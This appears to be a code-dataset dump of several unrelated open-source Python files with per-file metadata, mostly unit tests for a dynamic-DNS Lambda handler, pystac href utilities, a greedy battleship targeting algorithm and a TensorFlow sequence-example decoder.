self.__checkJson(result, "SUCCESS", "OK")
event = {
'queryStringParameters': { 'raw': '', 'hostname': 'abc', 'hash': 'xyz'},
'requestContext': { 'identity': { 'sourceIp': '1.1.1.1' } }
}
context = {}
result = handle(event, context)
self.__checkRaw(result, "SUCCESS", "OK")
@patch('dynamicdns.processor.factory')
@patch('dynamicdns.aws.s3config.factory')
def testDNSMissingParamHostname(self, mock_config, mock_processor):
self.__setUpMocks(configFailed=False, hashFailed=False, updateFailed=False, mock_config=mock_config, mock_processor=mock_processor)
event = {
'queryStringParameters': { 'hash': 'xyz', 'internalip': '2.2.2.2'},
'requestContext': { 'identity': { 'sourceIp': '1.1.1.1' } }
}
context = {}
result = handle(event, context)
self.__checkJson(result, "FAIL", "You have to pass 'hostname' querystring parameters.")
event = {
'queryStringParameters': { 'raw': '', 'hash': 'xyz', 'internalip': '2.2.2.2'},
'requestContext': { 'identity': { 'sourceIp': '1.1.1.1' } }
}
context = {}
result = handle(event, context)
self.__checkRaw(result, "FAIL", "You have to pass 'hostname' querystring parameters.")
@patch('dynamicdns.processor.factory')
@patch('dynamicdns.aws.s3config.factory')
def testDNSMissingParamHash(self, mock_config, mock_processor):
self.__setUpMocks(configFailed=False, hashFailed=False, updateFailed=False, mock_config=mock_config, mock_processor=mock_processor)
event = {
'queryStringParameters': { 'hostname': 'abc', 'internalip': '2.2.2.2'},
'requestContext': { 'identity': { 'sourceIp': '1.1.1.1' } }
}
context = {}
result = handle(event, context)
self.__checkJson(result, "FAIL", "You have to pass 'hash' querystring parameters.")
event = {
'queryStringParameters': { 'raw': '', 'hostname': 'abc', 'internalip': '2.2.2.2'},
'requestContext': { 'identity': { 'sourceIp': '1.1.1.1' } }
}
context = {}
result = handle(event, context)
self.__checkRaw(result, "FAIL", "You have to pass 'hash' querystring parameters.")
@patch('dynamicdns.processor.factory')
@patch('dynamicdns.aws.s3config.factory')
def testDNSMissingParamSourceIp(self, mock_config, mock_processor):
self.__setUpMocks(configFailed=False, hashFailed=False, updateFailed=False, mock_config=mock_config, mock_processor=mock_processor)
event = {
'queryStringParameters': { 'hostname': 'abc', 'hash': 'xyz', 'internalip': '2.2.2.2'}
}
context = {}
result = handle(event, context)
self.__checkJson(result, "FAIL", "Source IP address cannot be extracted from request context.")
event = {
'queryStringParameters': { 'raw': '', 'hostname': 'abc', 'hash': 'xyz', 'internalip': '2.2.2.2'}
}
context = {}
result = handle(event, context)
self.__checkRaw(result, "FAIL", "Source IP address cannot be extracted from request context.")
event = {
'queryStringParameters': { 'hostname': 'abc', 'hash': 'xyz', 'internalip': '2.2.2.2'},
'requestContext': {}
}
context = {}
result = handle(event, context)
self.__checkJson(result, "FAIL", "Source IP address cannot be extracted from request context.")
event = {
'queryStringParameters': { 'raw': '', 'hostname': 'abc', 'hash': 'xyz', 'internalip': '2.2.2.2'},
'requestContext': {}
}
context = {}
result = handle(event, context)
self.__checkRaw(result, "FAIL", "Source IP address cannot be extracted from request context.")
event = {
'queryStringParameters': { 'hostname': 'abc', 'hash': 'xyz', 'internalip': '2.2.2.2'},
'requestContext': None
}
context = {}
result = handle(event, context)
self.__checkJson(result, "FAIL", "Source IP address cannot be extracted from request context.")
event = {
'queryStringParameters': { 'raw': '', 'hostname': 'abc', 'hash': 'xyz', 'internalip': '2.2.2.2'},
'requestContext': None
}
context = {}
result = handle(event, context)
self.__checkRaw(result, "FAIL", "Source IP address cannot be extracted from request context.")
event = {
'queryStringParameters': { 'hostname': 'abc', 'hash': 'xyz', 'internalip': '2.2.2.2'},
'requestContext': { 'identity': {} }
}
context = {}
result = handle(event, context)
self.__checkJson(result, "FAIL", "Source IP address cannot be extracted from request context.")
event = {
'queryStringParameters': { 'raw': '', 'hostname': 'abc', 'hash': 'xyz', 'internalip': '2.2.2.2'},
'requestContext': { 'identity': {} }
}
context = {}
result = handle(event, context)
self.__checkRaw(result, "FAIL", "Source IP address cannot be extracted from request context.")
# -----------------------------------------------------------------------------
# TESTING HELPER METHODS
# -----------------------------------------------------------------------------
def __setUpMocks(self, configFailed: bool, hashFailed: bool, updateFailed: bool, mock_config, mock_processor):
config = S3ConfigProvider(None)
config.aws_region = MagicMock(return_value = 'aws_region')
config.route_53_record_ttl = MagicMock(return_value = 'route_53_record_ttl')
config.route_53_record_type = MagicMock(return_value = 'route_53_record_type')
config.route_53_zone_id = MagicMock(return_value = 'route_53_zone_id')
config.shared_secret = MagicMock(return_value = 'shared_secret')
if configFailed:
config.load = MagicMock(return_value = Error("Config Load failed"))
else:
config.load = MagicMock(return_value = config)
mock_config.return_value = config
processor = Processor(None)
if hashFailed:
processor.checkhash = MagicMock(return_value = Error("Hashcheck failed"))
else:
processor.checkhash = MagicMock(return_value = None)
if updateFailed:
processor.update = MagicMock(return_value = Error("Update failed"))
else:
processor.update = MagicMock(return_value = "OK")
mock_processor.return_value = processor
def __checkJson(self, result, status, message):
self.assertEqual(result['statusCode'], 200)
self.assertEqual(result['headers']['Content-Type'], 'application/json')
a = json.loads(result['body'])
b = json.loads('{"status": "' + status + '", "message": "' + message + '"}')
self.assertEqual(a, b)
def __checkRaw(self, result, status, message):
self.assertEqual(result['statusCode'], 200)
self.assertEqual(result['headers']['Content-Type'], 'text/plain')
self.assertEqual(result['body'], status + '\n' + message)
if __name__ == '__main__':
unittest.main()
| 38.640127
| 139
| 0.591198
| 1,171
| 12,133
| 5.98719
| 0.099061
| 0.017116
| 0.017116
| 0.07531
| 0.818999
| 0.77464
| 0.765226
| 0.765226
| 0.757667
| 0.748253
| 0
| 0.018686
| 0.245776
| 12,133
| 313
| 140
| 38.763578
| 0.747459
| 0.014671
| 0
| 0.60262
| 0
| 0
| 0.285583
| 0.078152
| 0
| 0
| 0
| 0
| 0.026201
| 1
| 0.048035
| false
| 0.017467
| 0.043668
| 0
| 0.09607
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
43399172e57e76fd90727f5f49c9db95a2165a5e
| 114
|
py
|
Python
|
pkgs/ops-pkg/src/genie/libs/ops/vlan/ios/vlan.py
|
miott/genielibs
|
6464642cdd67aa2367bdbb12561af4bb060e5e62
|
[
"Apache-2.0"
] | 94
|
2018-04-30T20:29:15.000Z
|
2022-03-29T13:40:31.000Z
|
pkgs/ops-pkg/src/genie/libs/ops/vlan/ios/vlan.py
|
miott/genielibs
|
6464642cdd67aa2367bdbb12561af4bb060e5e62
|
[
"Apache-2.0"
] | 67
|
2018-12-06T21:08:09.000Z
|
2022-03-29T18:00:46.000Z
|
pkgs/ops-pkg/src/genie/libs/ops/vlan/ios/vlan.py
|
miott/genielibs
|
6464642cdd67aa2367bdbb12561af4bb060e5e62
|
[
"Apache-2.0"
] | 49
|
2018-06-29T18:59:03.000Z
|
2022-03-10T02:07:59.000Z
|
'''
Vlan Genie Ops Object for IOS - CLI.
'''
from ..iosxe.vlan import Vlan as VlanXE
class Vlan(VlanXE):
pass
| 16.285714
| 39
| 0.675439
| 18
| 114
| 4.277778
| 0.777778
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.201754
| 114
| 7
| 40
| 16.285714
| 0.846154
| 0.315789
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.333333
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 6
|
434429d1bf72f145f7668192d9a728391c694267
| 71
|
py
|
Python
|
mra/core/commands/__init__.py
|
Bizarious/mra-bot
|
ff18f42e6957e0ecad21882cb066dcbb2b9b8fcf
|
[
"MIT"
] | null | null | null |
mra/core/commands/__init__.py
|
Bizarious/mra-bot
|
ff18f42e6957e0ecad21882cb066dcbb2b9b8fcf
|
[
"MIT"
] | null | null | null |
mra/core/commands/__init__.py
|
Bizarious/mra-bot
|
ff18f42e6957e0ecad21882cb066dcbb2b9b8fcf
|
[
"MIT"
] | null | null | null |
from .extension import *
from .command import *
from .context import *
| 17.75
| 24
| 0.746479
| 9
| 71
| 5.888889
| 0.555556
| 0.377358
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.169014
| 71
| 3
| 25
| 23.666667
| 0.898305
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
4a314995f64ca9d195cd182836ba7984bb39bb56
| 7,983
|
py
|
Python
|
tests/test_utils.py
|
emmanuelmathot/pystac
|
6552327f30658d25972c97024ed71865ed131e52
|
[
"Apache-2.0"
] | null | null | null |
tests/test_utils.py
|
emmanuelmathot/pystac
|
6552327f30658d25972c97024ed71865ed131e52
|
[
"Apache-2.0"
] | null | null | null |
tests/test_utils.py
|
emmanuelmathot/pystac
|
6552327f30658d25972c97024ed71865ed131e52
|
[
"Apache-2.0"
] | null | null | null |
import unittest
import os
import json
import ntpath
from datetime import datetime, timezone, timedelta
from pystac import utils
from pystac.utils import (make_relative_href, make_absolute_href, is_absolute_href)
class UtilsTest(unittest.TestCase):
def test_make_relative_href(self):
# Test cases of (source_href, start_href, expected)
test_cases = [
('/a/b/c/d/catalog.json', '/a/b/c/catalog.json', './d/catalog.json'),
('/a/b/catalog.json', '/a/b/c/catalog.json', '../catalog.json'),
('/a/catalog.json', '/a/b/c/catalog.json', '../../catalog.json'),
('http://stacspec.org/a/b/c/d/catalog.json', 'http://stacspec.org/a/b/c/catalog.json',
'./d/catalog.json'),
('http://stacspec.org/a/b/catalog.json', 'http://stacspec.org/a/b/c/catalog.json',
'../catalog.json'),
('http://stacspec.org/a/catalog.json', 'http://stacspec.org/a/b/c/catalog.json',
'../../catalog.json'),
('http://stacspec.org/a/catalog.json', 'http://cogeo.org/a/b/c/catalog.json',
'http://stacspec.org/a/catalog.json'),
('http://stacspec.org/a/catalog.json', 'https://stacspec.org/a/b/c/catalog.json',
'http://stacspec.org/a/catalog.json')
]
for source_href, start_href, expected in test_cases:
actual = make_relative_href(source_href, start_href)
self.assertEqual(actual, expected)
def test_make_relative_href_windows(self):
utils._pathlib = ntpath
try:
# Test cases of (source_href, start_href, expected)
test_cases = [
('C:\\a\\b\\c\\d\\catalog.json', 'C:\\a\\b\\c\\catalog.json', '.\\d\\catalog.json'),
('C:\\a\\b\\catalog.json', 'C:\\a\\b\\c\\catalog.json', '..\\catalog.json'),
('C:\\a\\catalog.json', 'C:\\a\\b\\c\\catalog.json', '..\\..\\catalog.json'),
('a\\b\\c\\catalog.json', 'a\\b\\catalog.json', '.\\c\\catalog.json'),
('a\\b\\catalog.json', 'a\\b\\c\\catalog.json', '..\\catalog.json'),
('http://stacspec.org/a/b/c/d/catalog.json',
'http://stacspec.org/a/b/c/catalog.json', './d/catalog.json'),
('http://stacspec.org/a/b/catalog.json', 'http://stacspec.org/a/b/c/catalog.json',
'../catalog.json'),
('http://stacspec.org/a/catalog.json', 'http://stacspec.org/a/b/c/catalog.json',
'../../catalog.json'),
('http://stacspec.org/a/catalog.json', 'http://cogeo.org/a/b/c/catalog.json',
'http://stacspec.org/a/catalog.json'),
('http://stacspec.org/a/catalog.json', 'https://stacspec.org/a/b/c/catalog.json',
'http://stacspec.org/a/catalog.json')
]
for source_href, start_href, expected in test_cases:
actual = make_relative_href(source_href, start_href)
self.assertEqual(actual, expected)
finally:
utils._pathlib = os.path
def test_make_absolute_href(self):
# Test cases of (source_href, start_href, expected)
test_cases = [('item.json', '/a/b/c/catalog.json', '/a/b/c/item.json'),
('./item.json', '/a/b/c/catalog.json', '/a/b/c/item.json'),
('./z/item.json', '/a/b/c/catalog.json', '/a/b/c/z/item.json'),
('../item.json', '/a/b/c/catalog.json', '/a/b/item.json'),
('item.json', 'https://stacspec.org/a/b/c/catalog.json',
'https://stacspec.org/a/b/c/item.json'),
('./item.json', 'https://stacspec.org/a/b/c/catalog.json',
'https://stacspec.org/a/b/c/item.json'),
('./z/item.json', 'https://stacspec.org/a/b/c/catalog.json',
'https://stacspec.org/a/b/c/z/item.json'),
('../item.json', 'https://stacspec.org/a/b/c/catalog.json',
'https://stacspec.org/a/b/item.json')]
for source_href, start_href, expected in test_cases:
actual = make_absolute_href(source_href, start_href)
self.assertEqual(actual, expected)
def test_make_absolute_href_on_vsitar(self):
rel_path = 'some/item.json'
cat_path = '/vsitar//tmp/catalog.tar/catalog.json'
expected = '/vsitar//tmp/catalog.tar/some/item.json'
self.assertEqual(expected, make_absolute_href(rel_path, cat_path))
def test_make_absolute_href_windows(self):
utils._pathlib = ntpath
try:
# Test cases of (source_href, start_href, expected)
test_cases = [('item.json', 'C:\\a\\b\\c\\catalog.json', 'c:\\a\\b\\c\\item.json'),
('.\\item.json', 'C:\\a\\b\\c\\catalog.json', 'c:\\a\\b\\c\\item.json'),
('.\\z\\item.json', 'Z:\\a\\b\\c\\catalog.json',
'z:\\a\\b\\c\\z\\item.json'),
('..\\item.json', 'a:\\a\\b\\c\\catalog.json', 'a:\\a\\b\\item.json'),
('item.json', 'HTTPS://stacspec.org/a/b/c/catalog.json',
'https://stacspec.org/a/b/c/item.json'),
('./item.json', 'https://stacspec.org/a/b/c/catalog.json',
'https://stacspec.org/a/b/c/item.json'),
('./z/item.json', 'https://stacspec.org/a/b/c/catalog.json',
'https://stacspec.org/a/b/c/z/item.json'),
('../item.json', 'https://stacspec.org/a/b/c/catalog.json',
'https://stacspec.org/a/b/item.json')]
for source_href, start_href, expected in test_cases:
actual = make_absolute_href(source_href, start_href)
self.assertEqual(actual, expected)
finally:
utils._pathlib = os.path
def test_is_absolute_href(self):
# Test cases of (href, expected)
test_cases = [('item.json', False), ('./item.json', False), ('../item.json', False),
('/item.json', True), ('http://stacspec.org/item.json', True)]
for href, expected in test_cases:
actual = is_absolute_href(href)
self.assertEqual(actual, expected)
def test_is_absolute_href_windows(self):
utils._pathlib = ntpath
try:
# Test cases of (href, expected)
test_cases = [('item.json', False), ('.\\item.json', False), ('..\\item.json', False),
('c:\\item.json', True), ('http://stacspec.org/item.json', True)]
for href, expected in test_cases:
actual = is_absolute_href(href)
self.assertEqual(actual, expected)
finally:
utils._pathlib = os.path
def test_datetime_to_str(self):
cases = (
('timezone naive, assume utc', datetime(2000, 1, 1), '2000-01-01T00:00:00Z'),
('timezone aware, utc', datetime(2000, 1, 1,
tzinfo=timezone.utc), '2000-01-01T00:00:00Z'),
('timezone aware, utc -7', datetime(2000, 1, 1, tzinfo=timezone(timedelta(hours=-7))),
'2000-01-01T00:00:00-07:00'),
)
for title, dt, expected in cases:
with self.subTest(title=title):
got = utils.datetime_to_str(dt)
self.assertEqual(expected, got)
def test_geojson_bbox(self):
# Use sample Geojson from https://en.wikipedia.org/wiki/GeoJSON
with open('tests/data-files/geojson/sample.geojson') as sample_geojson:
all_features = json.load(sample_geojson)
geom_dicts = [f['geometry'] for f in all_features['features']]
for geom in geom_dicts:
got = utils.geometry_to_bbox(geom)
self.assertNotEqual(got, None)
| 50.525316
| 100
| 0.534761
| 1,015
| 7,983
| 4.100493
| 0.097537
| 0.18765
| 0.03604
| 0.081691
| 0.80394
| 0.78568
| 0.755646
| 0.748438
| 0.71384
| 0.708554
| 0
| 0.011462
| 0.278717
| 7,983
| 157
| 101
| 50.847134
| 0.711358
| 0.040461
| 0
| 0.48062
| 0
| 0
| 0.388265
| 0.070047
| 0
| 0
| 0
| 0
| 0.069767
| 1
| 0.069767
| false
| 0
| 0.054264
| 0
| 0.131783
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
4a808a7a3af1474e8e5145718aba73c37903468a
| 9,286
|
py
|
Python
|
TP3/1. Battleship/Tests/GreedoTest.py
|
FdelMazo/TDA1
|
a61dc6abe0a30b129c3b0f8b2df6f74331e08dc7
|
[
"MIT"
] | 2
|
2020-10-10T17:34:16.000Z
|
2021-11-20T18:40:16.000Z
|
TP3/1. Battleship/Tests/GreedoTest.py
|
FdelMazo/7529rw-TDA
|
a61dc6abe0a30b129c3b0f8b2df6f74331e08dc7
|
[
"MIT"
] | null | null | null |
TP3/1. Battleship/Tests/GreedoTest.py
|
FdelMazo/7529rw-TDA
|
a61dc6abe0a30b129c3b0f8b2df6f74331e08dc7
|
[
"MIT"
] | null | null | null |
import unittest
from Greedo import Greedo
from GreedoNaive import GreedoNaive
from Partida import Partida
from Barco import Barco
class TestUnaLanzaderaGreedoSmart(unittest.TestCase):
def testUnaLanzaderaUnBarcoUnicaOpcionPosibleDerribarlo(self):
greedobruto = Greedo()
barco = Barco(100)
barco.setPosicion(0, 0)
matriz = [[100, 40, 30, 10]]
partida = Partida(matriz, [barco], 1, greedobruto)
targets = greedobruto.elegirTargetsDeLaPartida(partida)
partida.setTargetDelTurno(targets[0])
partida.jugarTurno()
self.assertTrue(barco.estaDerribado())
def testUnaLanzaderaUnBarcoUnicaOpcionPosibleNoDerribarlo(self):
greedobruto = Greedo()
barco = Barco(100)
barco.setPosicion(0, 0)
matriz = [[10, 40, 30, 10]]
partida = Partida(matriz, [barco], 1, greedobruto)
targets = greedobruto.elegirTargetsDeLaPartida(partida)
partida.setTargetDelTurno(targets[0])
partida.jugarTurno()
self.assertFalse(barco.estaDerribado())
def testUnaLanzaderaDosBarcosSacaLaMayorCantidadPosible(self):
greedobruto = Greedo()
A = Barco(100)
B = Barco(100)
A.setPosicion(0, 0)
B.setPosicion(0,1)
matriz = [[80, 40, 30, 10], [50, 30, 80, 100]]
partida = Partida(matriz, [A,B], 1, greedobruto)
targets = greedobruto.elegirTargetsDeLaPartida(partida)
partida.setTargetDelTurno(targets[0])
partida.jugarTurno()
self.assertFalse(A.estaDerribado())
self.assertFalse(B.estaDerribado())
self.assertTrue(A.getVida() < B.getVida())
def testUnaLanzaderaDosBarcosDerribaAlQuePuede(self):
greedobruto = Greedo()
A = Barco(100)
B = Barco(100)
A.setPosicion(0, 0)
B.setPosicion(0,1)
matriz = [[100, 40, 30, 10], [50, 30, 80, 100]]
partida = Partida(matriz, [A,B], 1, greedobruto)
targets = greedobruto.elegirTargetsDeLaPartida(partida)
partida.setTargetDelTurno(targets[0])
partida.jugarTurno()
self.assertTrue(A.estaDerribado())
self.assertFalse(B.estaDerribado())
def testUnaLanzaderaDosBarcosDerribaAlQuePuedeInvertido(self):
greedobruto = Greedo()
A = Barco(100)
B = Barco(100)
A.setPosicion(0, 0)
B.setPosicion(0,1)
matriz = [[50, 40, 30, 10], [100, 30, 80, 100]]
partida = Partida(matriz, [A,B], 1, greedobruto)
targets = greedobruto.elegirTargetsDeLaPartida(partida)
partida.setTargetDelTurno(targets[0])
partida.jugarTurno()
self.assertFalse(A.estaDerribado())
self.assertTrue(B.estaDerribado())
def testUnaLanzaderaDosBarcosDerribaIgualesDerribaAlPrimero(self):
greedobruto = Greedo()
A = Barco(100)
B = Barco(100)
A.setPosicion(0, 0)
B.setPosicion(0, 1)
matriz = [[100, 40, 30, 10], [100, 30, 80, 100]]
partida = Partida(matriz, [A,B], 1, greedobruto)
targets = greedobruto.elegirTargetsDeLaPartida(partida)
partida.setTargetDelTurno(targets[0])
partida.jugarTurno()
self.assertTrue(A.estaDerribado())
self.assertFalse(B.estaDerribado())
class TestDosLanzaderasGreedoSmart(unittest.TestCase):
def testDosLanzaderasUnBarcoNoSeDisparaABarcoYaMuerto(self):
greedo = GreedoNaive()
barco = Barco(100)
barco.setPosicion(0, 0)
matriz = [[100]]
partida = Partida(matriz, [barco], 2, greedo)
targets = greedo.elegirTargetsDeLaPartida(partida)
self.assertEqual(targets[0], [0,None])
def testDosLanzaderasDosBarcosSeMataAUNoSeDaniaAlOtro(self):
greedo = GreedoNaive()
A = Barco(100)
B = Barco(100)
A.setPosicion(0, 0)
B.setPosicion(0, 1)
matriz = [[100],[50]]
partida = Partida(matriz, [A,B], 2, greedo)
targets = greedo.elegirTargetsDeLaPartida(partida)
self.assertEqual(targets[0], [0,1])
class TestTresLanzaderasGreedoSmart(unittest.TestCase):
def testTresLanzaderasUnBarcoDerribado(self):
greedobruto = Greedo()
barco = Barco(100)
barco.setPosicion(0, 0)
matriz = [[50, 40, 30, 10]]
partida = Partida(matriz, [barco], 3, greedobruto)
targets = greedobruto.elegirTargetsDeLaPartida(partida)
partida.setTargetDelTurno(targets[0])
partida.jugarTurno()
self.assertTrue(barco.estaDerribado())
def testTresLanzaderasUnBarcoNoDerribado(self):
greedobruto = Greedo()
barco = Barco(100)
barco.setPosicion(0, 0)
matriz = [[10, 40, 30, 10]]
partida = Partida(matriz, [barco], 3, greedobruto)
targets = greedobruto.elegirTargetsDeLaPartida(partida)
partida.setTargetDelTurno(targets[0])
partida.jugarTurno()
self.assertFalse(barco.estaDerribado())
def testTresLanzaderasDosBarcoUnoDerribado(self):
greedobruto = Greedo()
A = Barco(100)
B = Barco(100)
A.setPosicion(0, 0)
B.setPosicion(0, 1)
matriz = [[50, 40, 30, 10], [40, 30, 80, 100]]
partida = Partida(matriz, [A, B], 3, greedobruto)
targets = greedobruto.elegirTargetsDeLaPartida(partida)
partida.setTargetDelTurno(targets[0])
partida.jugarTurno()
self.assertTrue(A.estaDerribado())
self.assertFalse(B.estaDerribado())
def testTresLanzaderasDosBarcoUnoDerribadoInvertido(self):
greedobruto = Greedo()
A = Barco(100)
B = Barco(100)
A.setPosicion(0, 0)
B.setPosicion(0, 1)
matriz = [[10, 40, 30, 10], [50, 30, 80, 100]]
partida = Partida(matriz, [A, B], 3, greedobruto)
targets = greedobruto.elegirTargetsDeLaPartida(partida)
partida.setTargetDelTurno(targets[0])
partida.jugarTurno()
self.assertFalse(A.estaDerribado())
self.assertTrue(B.estaDerribado())
def testTresLanzaderasDosBarcoAmbosDerribados(self):
greedobruto = Greedo()
A = Barco(100)
B = Barco(100)
A.setPosicion(0, 0)
B.setPosicion(0, 1)
matriz = [[50, 40, 30, 10], [100, 30, 80, 100]]
partida = Partida(matriz, [A, B], 3, greedobruto)
targets = greedobruto.elegirTargetsDeLaPartida(partida)
partida.setTargetDelTurno(targets[0])
partida.jugarTurno()
self.assertTrue(A.estaDerribado())
self.assertTrue(B.estaDerribado())
def testTresLanzaderasDosBarcoNingunoDerribado(self):
greedobruto = Greedo()
A = Barco(1000)
B = Barco(1000)
A.setPosicion(0, 0)
B.setPosicion(0, 1)
matriz = [[50, 40, 30, 10], [100, 30, 80, 100]]
partida = Partida(matriz, [A, B], 3, greedobruto)
targets = greedobruto.elegirTargetsDeLaPartida(partida)
partida.setTargetDelTurno(targets[0])
partida.jugarTurno()
self.assertFalse(A.estaDerribado())
self.assertFalse(B.estaDerribado())
def testTresLanzaderasDosBarcoNingunoDerribado2(self):
greedobruto = Greedo()
A = Barco(100)
B = Barco(100)
A.setPosicion(0, 0)
B.setPosicion(0, 1)
matriz = [[1, 1000, 30, 10], [2, 1000, 80, 100]]
partida = Partida(matriz, [A, B], 3, greedobruto)
targets = greedobruto.elegirTargetsDeLaPartida(partida)
partida.setTargetDelTurno(targets[0])
partida.jugarTurno()
self.assertFalse(A.estaDerribado())
self.assertFalse(B.estaDerribado())
class TestCuatroLanzaderasGreedoSmart(unittest.TestCase):
def testTresLanzaderasDosBarcosNoSeDisparaABarcoDerribado(self):
greedo = GreedoNaive()
A = Barco(100)
B = Barco(100)
A.setPosicion(0, 0)
B.setPosicion(0, 1)
matriz = [[50],[100]]
partida = Partida(matriz, [A,B], 4, greedo)
targets = greedo.elegirTargetsDeLaPartida(partida)
self.assertEqual(targets[0], [1,0,0,None])
class TestsDiferenciasGreedoNaive(unittest.TestCase):
def testGreeedoBrutoEligeElMejorTurnoPosible(self):
greedobruto = Greedo()
A = Barco(300)
B = Barco(200)
C = Barco(100)
A.setPosicion(0, 0)
B.setPosicion(0, 1)
C.setPosicion(0,2)
matriz = [[60],[50],[50]]
partida = Partida(matriz, [A, B, C], 2, greedobruto)
targets = greedobruto.elegirTargetsDeLaPartida(partida)
partida.setTargetDelTurno(targets[0])
partida.jugarTurno()
self.assertTrue(C.estaDerribado())
self.assertFalse(A.estaDerribado())
self.assertFalse(B.estaDerribado())
def testGreedoSmartElijeMejorTurnoQueGreedo(self):
greedobruto = Greedo()
A = Barco(300)
B = Barco(200)
C = Barco(100)
A.setPosicion(0, 0)
B.setPosicion(0, 1)
C.setPosicion(0, 2)
matriz = [[60], [50], [50]]
partida = Partida(matriz, [A, B, C], 2, greedobruto)
targets = greedobruto.elegirTargetsDeLaPartida(partida)
partida.setTargetDelTurno(targets[0])
partida.jugarTurno()
self.assertTrue(C.estaDerribado())
self.assertFalse(A.estaDerribado())
self.assertFalse(B.estaDerribado())
greedo = GreedoNaive()
A = Barco(300)
B = Barco(200)
C = Barco(100)
A.setPosicion(0, 0)
B.setPosicion(0, 1)
C.setPosicion(0, 2)
partidaG = Partida(matriz, [A, B, C], 2, greedo)
targets = greedo.elegirTargetsDeLaPartida(partidaG)
partidaG.setTargetDelTurno(targets[0])
partidaG.jugarTurno()
self.assertFalse(C.estaDerribado())
self.assertFalse(A.estaDerribado())
self.assertFalse(B.estaDerribado())
def testGreedoSmartElijeMejorTurnoQueGreedo2(self):
greedobruto = Greedo()
A = Barco(700)
B = Barco(260)
A.setPosicion(0, 0)
B.setPosicion(0, 1)
matriz = [[300], [280]]
partida = Partida(matriz, [A, B], 2, greedobruto)
targets = greedobruto.elegirTargetsDeLaPartida(partida)
partida.setTargetDelTurno(targets[0])
partida.jugarTurno()
self.assertFalse(A.estaDerribado())
self.assertTrue(B.estaDerribado())
greedo = GreedoNaive()
A = Barco(700)
B = Barco(260)
A.setPosicion(0, 0)
B.setPosicion(0, 1)
partidaG = Partida(matriz, [A, B], 2, greedo)
targets = greedo.elegirTargetsDeLaPartida(partidaG)
partidaG.setTargetDelTurno(targets[0])
partidaG.jugarTurno()
self.assertFalse(A.estaDerribado())
self.assertFalse(B.estaDerribado())
| 32.243056
| 67
| 0.725501
| 1,040
| 9,286
| 6.477885
| 0.067308
| 0.071248
| 0.040522
| 0.125872
| 0.799466
| 0.789372
| 0.773638
| 0.768146
| 0.768146
| 0.738756
| 0
| 0.059402
| 0.135257
| 9,286
| 287
| 68
| 32.355401
| 0.779577
| 0
| 0
| 0.796992
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.146617
| 1
| 0.071429
| false
| 0
| 0.018797
| 0
| 0.109023
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
4aa3afbe073a8df2f221ef741cdfb4adc4207cf4
| 11,307
|
py
|
Python
|
research/object_detection/data_decoders/tf_sequence_example_decoder_test.py
|
akshit-protonn/models
|
38c8c6fe4144c93d6aadd19981c2b90570c29eba
|
[
"Apache-2.0"
] | 82,518
|
2016-02-05T12:07:23.000Z
|
2022-03-31T23:09:47.000Z
|
research/object_detection/data_decoders/tf_sequence_example_decoder_test.py
|
yangxl-2014-fe/models
|
11ea5237818e791a5717716d5413977f4c4db1e3
|
[
"Apache-2.0"
] | 9,021
|
2016-03-08T01:02:05.000Z
|
2022-03-31T08:06:35.000Z
|
research/object_detection/data_decoders/tf_sequence_example_decoder_test.py
|
yangxl-2014-fe/models
|
11ea5237818e791a5717716d5413977f4c4db1e3
|
[
"Apache-2.0"
] | 54,341
|
2016-02-06T17:19:55.000Z
|
2022-03-31T10:27:44.000Z
|
# Copyright 2020 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tf_sequence_example_decoder.py."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import numpy as np
import tensorflow.compat.v1 as tf
from object_detection.core import standard_fields as fields
from object_detection.data_decoders import tf_sequence_example_decoder
from object_detection.dataset_tools import seq_example_util
from object_detection.utils import test_case
class TfSequenceExampleDecoderTest(test_case.TestCase):
def _create_label_map(self, path):
label_map_text = """
item {
name: "dog"
id: 1
}
item {
name: "cat"
id: 2
}
item {
name: "panda"
id: 4
}
"""
with tf.gfile.Open(path, 'wb') as f:
f.write(label_map_text)
